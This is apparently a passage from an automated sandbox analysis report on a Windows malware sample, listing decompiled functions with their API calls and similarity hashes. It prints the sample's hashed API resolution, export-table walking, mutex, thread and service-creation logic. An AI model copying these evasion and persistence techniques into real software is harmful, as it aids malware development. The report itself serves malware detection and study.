				void* _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;
				void* _t37;
				intOrPtr* _t38;
				void* _t40;
				void* _t41;
				intOrPtr* _t42;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t49;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t47 = _a8;
				_t22 = E0081F5C0(9, 0xc654d62);
				_t53 = _t52 + 8;
				_t23 =  *_t22(_t47, 1);
				_t48 = 0;
				if(_t23 != 0) {
					_t25 = E0081F5C0(9, 0x4a9139c);
					_t54 = _t53 + 8;
					_t26 =  *_t25(_t47, 1, 0, 0);
					_t60 = _t26;
					if(_t26 != 0) {
						_t42 = _a4;
						_v20 = 0;
						_t49 = E0080D910(_t60);
						_t28 = E00808AE0(0x82efa8e);
						_t55 = _t54 + 4;
						if(_t49 <= _t28) {
							__eflags = _t49 - 2;
							if(_t49 != 2) {
								goto L10;
							} else {
								_t30 = E0081F5C0(9, 0xabc78f7);
								_t55 = _t55 + 8;
								_t31 =  *_t30(0x8240c8, 1,  &_v20, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									goto L10;
								} else {
									goto L7;
								}
							}
						} else {
							_t38 = E0081F5C0(9, 0xabc78f7);
							_t40 = E0080F180(0x823850,  &_v72);
							_t55 = _t55 + 0x10;
							_t41 =  *_t38(_t40, 1,  &_v20, 0); // executed
							if(_t41 != 0) {
								L7:
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t32 = E0081F5C0(9, 0x8a8238c);
								_t57 = _t55 + 8;
								_t33 =  *_t32(_v20,  &_v28,  &_v32,  &_v24);
								__eflags = _t33;
								if(_t33 == 0) {
									L9:
									_t34 = E0081F5C0(0, 0x982abe5);
									_t55 = _t57 + 8;
									 *_t34(_v20);
									goto L10;
								} else {
									_t36 = E0081F5C0(9, 0x4a8239c);
									_t55 = _t57 + 8;
									_t37 =  *_t36(_t47, _v28, _v32, _v24);
									__eflags = _t37;
									if(_t37 == 0) {
										goto L9;
									}
								}
							} else {
								L10:
								_v20 = 0xffffffff;
							}
						}
						if(_t42 != 0) {
							 *_t42 = E00808AE0(0x82efa80);
							 *((intOrPtr*)(_t42 + 4)) = _t47;
							 *((intOrPtr*)(_t42 + 8)) = 0;
						}
						_t48 = _v20;
					}
				}
				return _t48;
			}
































    0x008010e9
    0x008010f3
    0x008010f8
    0x008010fe
    0x00801100
    0x00801104
    0x00801111
    0x00801116
    0x00801120
    0x00801122
    0x00801124
    0x0080112a
    0x0080112d
    0x00801139
    0x00801140
    0x00801145
    0x0080114a
    0x00801182
    0x00801185
    0x00000000
    0x0080118b
    0x00801192
    0x00801197
    0x008011a7
    0x008011a9
    0x008011ab
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x008011ab
    0x0080114c
    0x00801153
    0x00801166
    0x0080116b
    0x00801177
    0x0080117b
    0x008011ad
    0x008011ad
    0x008011b4
    0x008011bb
    0x008011c9
    0x008011ce
    0x008011e0
    0x008011e2
    0x008011e4
    0x00801205
    0x0080120c
    0x00801211
    0x00801217
    0x00000000
    0x008011e6
    0x008011ed
    0x008011f2
    0x008011ff
    0x00801201
    0x00801203
    0x00000000
    0x00000000
    0x00801203
    0x0080117d
    0x00801219
    0x00801219
    0x00801219
    0x0080117b
    0x00801222
    0x00801231
    0x00801233
    0x00801236
    0x00801236
    0x0080123d
    0x0080123d
    0x00801124
    0x00801249

    APIs
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00801177
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: DescriptorSecurity$ConvertLibraryLoadString
    • String ID:
    • API String ID: 3927295052-0
    • Opcode ID: c83502bf4d06da82f4ccbfa8bf5e03a6cd91517402c6bb1adfb86a926535f143
    • Instruction ID: 751849fc82f8c9fb1b76ff7b3f30f0d1aafc44dd528daa720035004594e0db78
    • Opcode Fuzzy Hash: c83502bf4d06da82f4ccbfa8bf5e03a6cd91517402c6bb1adfb86a926535f143
    • Instruction Fuzzy Hash: 49318671E403167AEF10AAE49C47FFF7A68FF11754F040524FA18F61C2FAB15A4586A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0080DBE0, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
    Download Yara Rule
    C-Code - Quality: 82%
    			E0080DBE0(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, signed char _a20, signed char _a24) {
				signed int _v20;
				char _v540;
				void* _t15;
				long _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t23;
				signed int _t24;
				char* _t25;
				void* _t26;
				void* _t28;

				_t23 = 0;
				_v20 = _a24 & 0x000000ff;
				_t24 = _a20 & 0x000000ff;
				_t25 =  &_v540;
				do {
					E0081ACA0(_t29, _a4, _t25, _t24, _v20);
					_t15 = E00821490(_a12, _a8, _t25);
					_t28 = _t26 + 0x1c;
					if(_t15 == 0) {
						goto L2;
					}
					if(_a16 == 0) {
						L1:
						E0081F5C0(0, 0xbf8ba27);
						_t28 = _t28 + 8;
						_t19 = GetFileAttributesW(_a12); // executed
						__eflags = _t19 - 0xffffffff;
						if(__eflags == 0) {
							return 1;
						}
						goto L2;
					}
					_t21 = E0081F5C0(3, 0xd85c117);
					_t28 = _t28 + 8;
					_t22 =  *_t21(_a12, _a16);
					_t32 = _t22;
					if(_t22 != 0) {
						goto L1;
					}
					L2:
					E00806CC0(_t32, _t23, 1);
					_t26 = _t28 + 8;
					_t23 = _t23 + 1;
					_t29 = _t23 - 0x64;
				} while (_t23 != 0x64);
				return 0;
			}














    0x0080dbec
    0x0080dbf2
    0x0080dbf5
    0x0080dbf9
    0x0080dc3a
    0x0080dc42
    0x0080dc51
    0x0080dc56
    0x0080dc5b
    0x00000000
    0x00000000
    0x0080dc61
    0x0080dc10
    0x0080dc17
    0x0080dc1c
    0x0080dc22
    0x0080dc24
    0x0080dc27
    0x00000000
    0x0080dc84
    0x00000000
    0x0080dc27
    0x0080dc6a
    0x0080dc6f
    0x0080dc78
    0x0080dc7a
    0x0080dc7c
    0x00000000
    0x00000000
    0x0080dc29
    0x0080dc2c
    0x0080dc31
    0x0080dc34
    0x0080dc35
    0x0080dc35
    0x00000000

    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: f05560868fedb1448af9294bd871f517b9e2f3fabd48d693ebe11c3c2d23554f
    • Instruction ID: 6fa99e53641b343a32050703c897a7b1bf8543229a80d0f8f1679a76e7b013a7
    • Opcode Fuzzy Hash: f05560868fedb1448af9294bd871f517b9e2f3fabd48d693ebe11c3c2d23554f
    • Instruction Fuzzy Hash: E31108759403196AEF512EA4AC06FFA3B29FF11359F040520FD68E12D3F2778974D6A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00816F40, Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON
    Download Yara Rule
    C-Code - Quality: 54%
    			E00816F40(void* __eax, void* __ecx, void* __edx, void* __eflags, char _a4) {
				char _v17;
				intOrPtr _v24;
				char _v62;
				char _v100;
				char _v192;
				char _v1232;
				char _v1748;
				void* _t31;
				void* _t33;
				void* _t34;
				signed int _t36;
				intOrPtr* _t38;
				void* _t40;
				void* _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t45;
				void* _t48;
				signed int _t49;
				intOrPtr* _t51;
				intOrPtr _t54;
				void* _t55;
				void* _t56;
				void* _t57;
				intOrPtr* _t58;
				intOrPtr* _t59;
				void* _t65;
				void* _t66;
				char* _t67;
				void* _t74;
				void* _t85;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;
				void* _t100;
				void* _t103;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t117;
				void* _t118;

				_push(__eax);
				_t85 = __edx;
				_t65 = __ecx;
				_v17 = _a4;
				_t91 = L0080E190(E00808AE0(0x82efa90));
				E00822550(_t26);
				L00821AE0(_t91, _t65);
				_t3 = _t91 + 0xc; // 0xc
				L00821AE0(_t3, _t85);
				 *((char*)(_t91 + 0x18)) = _v17;
				_t31 = E008103C0(0xffffffff); // executed
				_t100 = _t97 + 0xc;
				if(_t31 != 4) {
					E0081F5C0(0, 0xa0733d4);
					_t33 = CreateThread(0, 0, E00816130, _t91, 0, 0); // executed
					return _t33;
				} else {
					_t74 = _t91;
					_t103 = _t100 + 4;
					_pop(_t92);
					_pop(_t86);
					_pop(_t66);
					_pop(_t95);
					_t93 = _t74;
					_t34 = E00822160(_t74 + 0xc);
					_t67 =  &_v1748;
					E00809A50(_t67, _t34, 0xffffffff);
					_t36 = E00808AE0(0x82efa8f);
					_t38 = E0081F5C0(_t36, E00808AE0(0xdc4644b));
					 *_t38(_t67, _t92, _t86, _t66, _t95);
					_t40 = E008103C0(0xffffffff);
					_t109 = _t103 - 0x6c4 + 0x20;
					if(_t40 != 4) {
						_t42 = E0080F180(0x823570,  &_v192);
						_t110 = _t109 + 8;
						_t88 = _t42;
						if( *((char*)(_t93 + 0x18)) == 0) {
							_t43 = E0080FD10(_t67);
							_t111 = _t110 + 4;
							_v24 = _t43;
							_t44 = E00822160(_t93);
							_push(_v24);
							_push(_t67);
						} else {
							_t48 = E0080AAF0(E0080F180(0x8236c0,  &_v100),  &_v1232, 0x208, _t47, _t67);
							_t111 = _t110 + 0x18;
							_t44 = E00822160(_t93);
							_push(_t48);
							_push( &_v1232);
						}
						_push(_t44);
						_push(_t88);
						_push(0x80000001);
						_t45 = E008105A0();
						_t112 = _t111 + 0x14;
					} else {
						_t49 = E00808AE0(0x82efa85);
						_t51 = E0081F5C0(_t49, E00808AE0(0xaacb94b));
						_t112 = _t109 + 0x10;
						_t45 =  *_t51(0, 0, 2);
						if(_t45 != 0) {
							_t90 = _t45;
							if( *((char*)(_t93 + 0x18)) == 0) {
								E00809A50( &_v1232, _t67, 0xffffffff);
								_t117 = _t112 + 0xc;
							} else {
								_v24 = E0080F180(0x8236c0,  &_v62);
								E0080AAF0(E00808AE0(0x82ef884),  &_v1232, _t63, _v24, _t67);
								_t117 = _t112 + 0x1c;
							}
							_t54 = E0081F5C0(9, 0x42453f7);
							_t118 = _t117 + 8;
							_v24 = _t54;
							_t55 = E00822160(_t93);
							_t56 = E00822160(_t93);
							_t57 = _v24(_t90, _t56, _t55, 0xf01ff, 0x110, 2, 0,  &_v1232, 0, 0, 0, 0, 0);
							if(_t57 != 0) {
								_t59 = E0081F5C0(9, 0x48eed75);
								_t118 = _t118 + 8;
								 *_t59(_t57);
							}
							_t58 = E0081F5C0(9, 0x48eed75);
							_t112 = _t118 + 8;
							_t45 =  *_t58(_t90);
						}
					}
					return _t45;
				}
			}


















































    0x00816f46
    0x00816f47
    0x00816f49
    0x00816f4e
    0x00816f67
    0x00816f6b
    0x00816f73
    0x00816f78
    0x00816f7c
    0x00816f84
    0x00816f89
    0x00816f8e
    0x00816f93
    0x00816faa
    0x00816fc0
    0x00816fc9
    0x00816f95
    0x00816f95
    0x00816f97
    0x00816f9a
    0x00816f9b
    0x00816f9c
    0x00816f9d
    0x0081720c
    0x00817211
    0x00817216
    0x00817220
    0x0081722d
    0x00817246
    0x0081724f
    0x00817253
    0x00817258
    0x0081725d
    0x008172e7
    0x008172ec
    0x008172ef
    0x008172f5
    0x00817332
    0x00817337
    0x0081733a
    0x0081733f
    0x00817344
    0x00817347
    0x008172f7
    0x00817316
    0x0081731b
    0x00817322
    0x00817327
    0x0081732e
    0x0081732e
    0x00817348
    0x00817349
    0x0081734a
    0x0081734f
    0x00817354
    0x0081725f
    0x00817264
    0x0081727d
    0x00817282
    0x0081728b
    0x0081728f
    0x00817295
    0x0081729b
    0x00817366
    0x0081736b
    0x008172a1
    0x008172b2
    0x008172ce
    0x008172d3
    0x008172d3
    0x00817375
    0x0081737a
    0x0081737d
    0x00817382
    0x0081738b
    0x008173b2
    0x008173b7
    0x008173c2
    0x008173c7
    0x008173cb
    0x008173cb
    0x008173d4
    0x008173d9
    0x008173dd
    0x008173dd
    0x0081728f
    0x008173e9
    0x008173e9

    APIs
    • CreateThread.KERNEL32(00000000,00000000,Function_00016130,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00816FC0
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CreateThread
    • String ID:
    • API String ID: 2422867632-0
    • Opcode ID: 9342b1e02029ba6f6d2d1d1de385d4d8069e679115443a7ff3ae9b44cdbd93b8
    • Instruction ID: 5181c09d37706f69a783077f968b41d358c86bcf7dba4cf6b46257fa7b2199db
    • Opcode Fuzzy Hash: 9342b1e02029ba6f6d2d1d1de385d4d8069e679115443a7ff3ae9b44cdbd93b8
    • Instruction Fuzzy Hash: 42012466B4426036E92021AC3C03BAF6A5CDF916B4F140075F95FCA2C3E891A59582B3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0081E460, Relevance: 1.6, APIs: 1, Instructions: 55synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 54%
    			E0081E460(void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, WCHAR* _a8, intOrPtr _a12) {
				void* _t8;
				signed char _t9;
				intOrPtr* _t12;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				E0081F5C0(0, E00808AE0(0x6caeedb));
				_t8 = CreateMutexW(_a4, 0, _a8); // executed
				_t20 = _t8;
				_t9 = E00805BF0(_t8, 0);
				_t22 = 0;
				if((_t9 & 0x00000001) == 0) {
					_t12 = E0081F5C0(0, E00808AE0(0x8571068));
					_push(_a12);
					_push(_t20);
					if(( !( *_t12()) | 0x00000080) == 0xffffffff) {
						_t22 = _t20;
					} else {
						_t16 = E0081F5C0(0, 0xb8e7db5);
						 *_t16(_t20);
					}
				}
				return _t22;
			}









    0x0081e47c
    0x0081e488
    0x0081e48a
    0x0081e48f
    0x0081e497
    0x0081e49b
    0x0081e4b0
    0x0081e4b8
    0x0081e4b9
    0x0081e4c6
    0x0081e4dc
    0x0081e4c8
    0x0081e4cf
    0x0081e4d8
    0x0081e4d8
    0x0081e4c6
    0x0081e4e4

    APIs
    • CreateMutexW.KERNEL32(?,00000000,0082518C,?,?,?), ref: 0081E488
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CreateLibraryLoadMutex
    • String ID:
    • API String ID: 427046056-0
    • Opcode ID: 91020c1a335dd3756830b3ae3c336ffb03f4358b1400049a81a868a468f7676d
    • Instruction ID: da17a3ab254e58e94f617bd0baf669688898cf6c90e6ba4e28fef5b40415c0cc
    • Opcode Fuzzy Hash: 91020c1a335dd3756830b3ae3c336ffb03f4358b1400049a81a868a468f7676d
    • Instruction Fuzzy Hash: 67F081A6A4061477E56035A82C43FBF260CFFA2B6AF140032FE5DE6282E951A95501F7
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0081D3B0, Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 45%
    			E0081D3B0(intOrPtr _a4, intOrPtr _a8) {
				void* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				void* _t15;

				_t12 = _a8;
				_t22 = _t12;
				if(_t12 == 0) {
					return 0;
				}
				_t13 = _a4;
				_t3 = _t12 - 0x3a80a221; // -973047337
				_t15 = E00806CC0(_t22, _t3, 4) + 0x3a80a221;
				E00806CC0(_t22, _t12, 4);
				if(_t13 == 0) {
					E0081F5C0(0, 0x8685de3);
					_push(_t15);
				} else {
					E0081F5C0(0, E00808AE0(0xf451af));
					_push(_t15);
					_push(_t13);
				}
				_push(8);
				_t9 = RtlReAllocateHeap( *0x827a70); // executed
				return _t9;
			}







    0x0081d3b6
    0x0081d3b9
    0x0081d3bb
    0x00000000
    0x0081d404
    0x0081d3bd
    0x0081d3c0
    0x0081d3d3
    0x0081d3dc
    0x0081d3e6
    0x0081d40f
    0x0081d417
    0x0081d3e8
    0x0081d3f8
    0x0081d400
    0x0081d401
    0x0081d401
    0x0081d418
    0x0081d420
    0x00000000

    APIs
    • RtlReAllocateHeap.NTDLL(00000008,-3A80A221,?,?,?,?,?,00000000,?,?,?), ref: 0081D420
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 07e9e1be4baa3850b0725b65b92f9367933d362c621985d769088b6c93bcde60
    • Instruction ID: 05226d9fbe567ed3dba56ad69f3d35699e4f25a7e3c0a875981dc5db02afa143
    • Opcode Fuzzy Hash: 07e9e1be4baa3850b0725b65b92f9367933d362c621985d769088b6c93bcde60
    • Instruction Fuzzy Hash: C4F0FC62A8431477E55065957C47FDB360CFF5176EF040031FE0DE5282F462795942B2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0081D310, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0081D310(intOrPtr _a4) {
				void* _t3;
				void* _t6;
				void* _t7;
				intOrPtr _t8;

				_t8 = _a4;
				if(_t8 == 0) {
					return 0;
				}
				_t3 = E00808AE0(0x82efa88);
				E0081F5C0(0, 0x8685de3);
				_t7 =  *0x827a70; // 0x9a0000
				_t6 = RtlAllocateHeap(_t7, E00808AE0(0x82efa84), _t8 + _t3); // executed
				return _t6;
			}







    0x0081d316
    0x0081d31b
    0x00000000
    0x0081d357
    0x0081d322
    0x0081d333
    0x0081d33d
    0x0081d353
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(009A0000,00000000,00810659,?,?,?,?), ref: 0081D353
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 7ec293bc81744a985f2a5f1d127cebe3ff5312bd3e9af5c901c590fd1ba4bc8c
    • Instruction ID: eb4c199515f8a05eb135c908f140036e211aead233034e5b42b912236314665a
    • Opcode Fuzzy Hash: 7ec293bc81744a985f2a5f1d127cebe3ff5312bd3e9af5c901c590fd1ba4bc8c
    • Instruction Fuzzy Hash: 40E092A7A442147BD21022AD7C46E7F675CFA86B69F090036FA0ED2302FCA1A94042F3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00812BB0, Relevance: 1.5, APIs: 1, Instructions: 23networkCOMMON
    Download Yara Rule
    C-Code - Quality: 58%
    			E00812BB0(void* __eflags) {
				char _v408;
				intOrPtr* _t4;
				signed short _t5;
				signed int _t7;

				_t4 = E0081F5C0(6, 0xaaf7240); // executed
				_t5 = E00804290(0xf88e);
				_t7 =  *_t4(_t5 & 0x0000ffff,  &_v408); // executed
				return _t7 & 0xffffff00 | _t7 == 0x00000000;
			}







    0x00812bc1
    0x00812bd0
    0x00812be3
    0x00812bf2

    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Startup
    • String ID:
    • API String ID: 724789610-0
    • Opcode ID: c958bb3823b25758dc798c59fac922a99db7c9413a468369c5c6da285cfd7c18
    • Instruction ID: 8615c676fbe9f9dd69190c5b485b32d5d15c06262ad01d9234bee10065f87dc7
    • Opcode Fuzzy Hash: c958bb3823b25758dc798c59fac922a99db7c9413a468369c5c6da285cfd7c18
    • Instruction Fuzzy Hash: EED01261D4132427E62471B57D17EF63A5C9B01754F440071BE4CD51C2F855A96881E7
    Uniqueness

    Uniqueness Score: -1.00%

    Function 008046C0, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E008046C0(void* _a4) {
				void* _t2;
				char _t5;
				void* _t6;

				_t6 = _a4;
				if(_t6 != 0) {
					E0081F5C0(0, E00808AE0(0x3a824d9));
					_t5 = RtlFreeHeap( *0x827a70, 0, _t6); // executed
					return _t5;
				}
				return _t2;
			}






    0x008046c4
    0x008046c9
    0x008046db
    0x008046ec
    0x00000000
    0x008046ec
    0x008046f0

    APIs
    • RtlFreeHeap.NTDLL(00000000,0080EF06,?,?,?), ref: 008046EC
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 91e47abc78055fe91fbe803411425838734150f729363bf1ff258a77cf8eeb4f
    • Instruction ID: d878d5bb934ee695d2c1fd6ed6765d3b1092c4753ae750f3fea76bf32e5a5318
    • Opcode Fuzzy Hash: 91e47abc78055fe91fbe803411425838734150f729363bf1ff258a77cf8eeb4f
    • Instruction Fuzzy Hash: E4D05E72A8523437E4502699AC03FAF3A0CFB12B65F080422BE0EE6582E982695001F3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00816780, Relevance: 1.5, APIs: 1, Instructions: 17networkCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00816780(void* __eax) {
				void _v8;
				int _t5;

				_v8 = 0xa;
				E0081F5C0(0x13, 0x5b4d601); // executed
				_t5 = InternetSetOptionA(0, 0x49,  &_v8, 4); // executed
				return _t5;
			}





    0x00816784
    0x00816792
    0x008167a4
    0x008167aa

    APIs
    • InternetSetOptionA.WININET(00000000,00000049,0000000A,00000004), ref: 008167A4
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: InternetOption
    • String ID:
    • API String ID: 3327645240-0
    • Opcode ID: 02716467b8d7b749decfd02a65ed797f860bd8a26bab230bc97c0b72fbbe20e6
    • Instruction ID: 8334819f4513918a771b2c519bf348831c519c19b8b19f71a20663ef32684497
    • Opcode Fuzzy Hash: 02716467b8d7b749decfd02a65ed797f860bd8a26bab230bc97c0b72fbbe20e6
    • Instruction Fuzzy Hash: 41D0A9B0A803087AFA20DAC0AC03F8A329C9B10B28F000074B30DE91C1E5FA2714A5A7
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00814650, Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
    Download Yara Rule
    C-Code - Quality: 79%
    			E00814650(intOrPtr _a4, intOrPtr _a8, signed char _a12, signed char _a16, char _a20) {
				char _t8;
				signed int _t11;
				void* _t13;
				signed int _t14;
				void* _t15;

				if(_a8 == 0) {
					L8:
					return _t8;
				}
				_t11 = _a16 & 0x000000ff;
				_t14 = _a12 & 0x000000ff;
				_t13 = 0;
				if(0 != 0) {
					L5:
					if(_a20 != 0 && 1 != 0) {
						E0081F5C0(0, 0x7a2bc0);
						_t15 = _t15 + 8;
						Sleep(0x14); // executed
					}
					while(1) {
						L3:
						_t8 = E0081B4E0(_t14, _t11);
						_t15 = _t15 + 8;
						 *((char*)(_a4 + _t13)) = _t8;
						_t13 = _t13 + 1;
						if(_a8 == _t13) {
							goto L8;
						}
						if(_t13 == 0) {
							continue;
						}
						goto L5;
					}
					goto L8;
				}
				goto L3;
			}








    0x0081465a
    0x008146af
    0x008146af
    0x008146af
    0x0081465c
    0x00814660
    0x00814664
    0x00814668
    0x0081468a
    0x0081468e
    0x0081469d
    0x008146a2
    0x008146a7
    0x008146a7
    0x00814670
    0x00814670
    0x00814672
    0x00814677
    0x0081467d
    0x00814680
    0x00814684
    0x00000000
    0x00000000
    0x00814688
    0x00000000
    0x00000000
    0x00000000
    0x00814688
    0x00000000
    0x00814670
    0x00000000

    APIs
    • Sleep.KERNEL32(00000014,?,?,00000000,00000010), ref: 008146A7
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Sleep
    • String ID:
    • API String ID: 3472027048-0
    • Opcode ID: b2bb87e1eea7e2a2963499cb02277e7a6a55a00e86a66b53296a0e73a55cde55
    • Instruction ID: b9810ba9991b56c91733d524b915f4c62042aca2cf094bfcd8c859204b947156
    • Opcode Fuzzy Hash: b2bb87e1eea7e2a2963499cb02277e7a6a55a00e86a66b53296a0e73a55cde55
    • Instruction Fuzzy Hash: 10F02BE540424925F7124E196C01BEB3B5CEFE379EF241025FD58C9282D2354DC2C7B1
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 0081F870, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 250libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E0081F870(signed int _a4, intOrPtr _a8) {
				CHAR* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v136;
				void* _t72;
				void* _t77;
				intOrPtr* _t80;
				void* _t86;
				void* _t90;
				void* _t91;
				void* _t94;
				signed int _t98;
				void* _t100;
				signed char _t105;
				signed int _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				char _t117;
				signed int _t118;
				signed int _t125;
				void* _t126;
				intOrPtr _t129;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr* _t137;
				intOrPtr _t139;
				void* _t140;
				_Unknown_base(*)()* _t147;
				char* _t148;
				intOrPtr _t149;
				CHAR* _t152;
				signed char* _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t164;
				void* _t166;
				void* _t167;
				void* _t172;
				void* _t177;

				_t118 = _a4;
				_t147 = 0;
				_t180 = _t118;
				if(_t118 != 0) {
					_t72 = E0081B420(_t180, _t118);
					_t158 = _t157 + 4;
					_t134 =  *((intOrPtr*)(_t72 + 0x60));
					_t181 =  *((intOrPtr*)(_t134 + _t118 + 0x18));
					if( *((intOrPtr*)(_t134 + _t118 + 0x18)) != 0) {
						_v32 =  *((intOrPtr*)(_t72 + 0x64));
						_t135 = _t134 + _t118;
						_t148 = E00802640(0, E00806CC0(_t181, E00802640(0,  *((intOrPtr*)(_t135 + 0x24))),  ~_t118));
						_v28 = _t135;
						_t77 = E00802640(0,  *((intOrPtr*)(_t135 + 0x20)));
						_t80 = E00802640(0, E00802640(0, _t118) + _t77);
						_t164 = _t158 + 0x30;
						_t137 = _t80;
						_t129 = 0;
						_t119 =  &_v136;
						0;
						0;
						0;
						do {
							_v36 = _t129;
							_v20 = _t148;
							_t149 =  *_t137;
							E00806CC0(0, _t149, _a4);
							E0080AF10(_t119, 0x64);
							_t166 = _t164 + 0x10;
							_t85 =  *((intOrPtr*)(_t149 + _a4));
							if( *((intOrPtr*)(_t149 + _a4)) != 0) {
								_t155 = _t149 + _a4;
								_t126 = 0;
								do {
									_t117 = E00804AE0(0, _t85);
									_t166 = _t166 + 4;
									 *((char*)(_t156 + _t126 - 0x84)) = _t117;
									_t85 =  *(_t155 + _t126 + 1) & 0x000000ff;
									_t126 = _t126 + 1;
								} while (_t85 != 0);
							}
							_push(0xffffffff);
							_t119 =  &_v136;
							_t86 = E00808E60( &_v136);
							_t167 = _t166 + 8;
							if(_t86 == _a8) {
								_t90 = E00806CC0(__eflags,  *((intOrPtr*)(_v28 + 0x1c)), _a4);
								_t91 = E00808AE0(0xab29d786);
								_t147 = E00808AE0(0xab29d786) +  *((intOrPtr*)(_t90 + ( *_v20 & 0x0000ffff) * 4)) - _t91 + _a4;
								_t139 = _v28;
								E00806CC0(__eflags,  *((intOrPtr*)(_t90 + ( *_v20 & 0x0000ffff) * 4)), _a4);
								_t94 = E00808AE0(0xea92e690);
								_t172 = _t167 + 0x1c;
								__eflags = _t147 - _t139;
								if(_t147 > _t139) {
									_t140 = _t139 - _t94;
									_t38 = _v32 - 0x1d43e3e4; // -490988516
									__eflags = _t147 - _t140 + _t38;
									if(_t147 < _t140 + _t38) {
										__eflags = 1;
										if(1 != 0) {
											_t98 =  *_t147;
											__eflags = _t98 - 0x2e;
											if(_t98 != 0x2e) {
												_t125 = 0;
												__eflags = 0;
												do {
													 *(_t156 + _t125 - 0x84) = _t98;
													_t98 =  *(_t147 + _t125 + 1) & 0x000000ff;
													_t125 = _t125 + 1;
													__eflags = _t98 - 0x2e;
												} while (_t98 != 0x2e);
											}
											_t44 = _t147 + 1; // 0x2
											_v20 = 0 + _t44;
											 *((short*)(_t156 + 0xffffffffffffff7c)) = 0x642e;
											_t100 = E00808AE0(0x82efa8f);
											E00808AE0(0x82efa8f);
											 *((char*)(_t156 + 0xffffffffffffff7e)) = 0x6c;
											E00808AE0(0x82efa88);
											 *((char*)(_t156 + _t100 - 0x84)) = E008027A0(0xe0);
											 *((char*)(_t156 + 0xffffffffffffff80)) = 0;
											_v24 = 0;
											_t105 = E008094A0( *(0 + _t147 + 1) & 0x000000ff, 0x23);
											_t177 = _t172 + 0x18;
											__eflags = _t105 & 0x00000001;
											if((_t105 & 0x00000001) == 0) {
												_t152 = _v20;
											} else {
												_t110 = _v20[1];
												__eflags = _t110;
												if(_t110 == 0) {
													_t152 =  &_v24;
												} else {
													_t63 = _t147 + 3; // 0x4
													_t153 = 0 + _t63;
													do {
														_t111 = E00808AE0(0x30866b89);
														E00806CC0(__eflags, _t110, 0xffffffd0);
														_t113 = E00802640(0, _v24 + _v24 + (_v24 + _v24) * 4);
														_t177 = _t177 + 0x14;
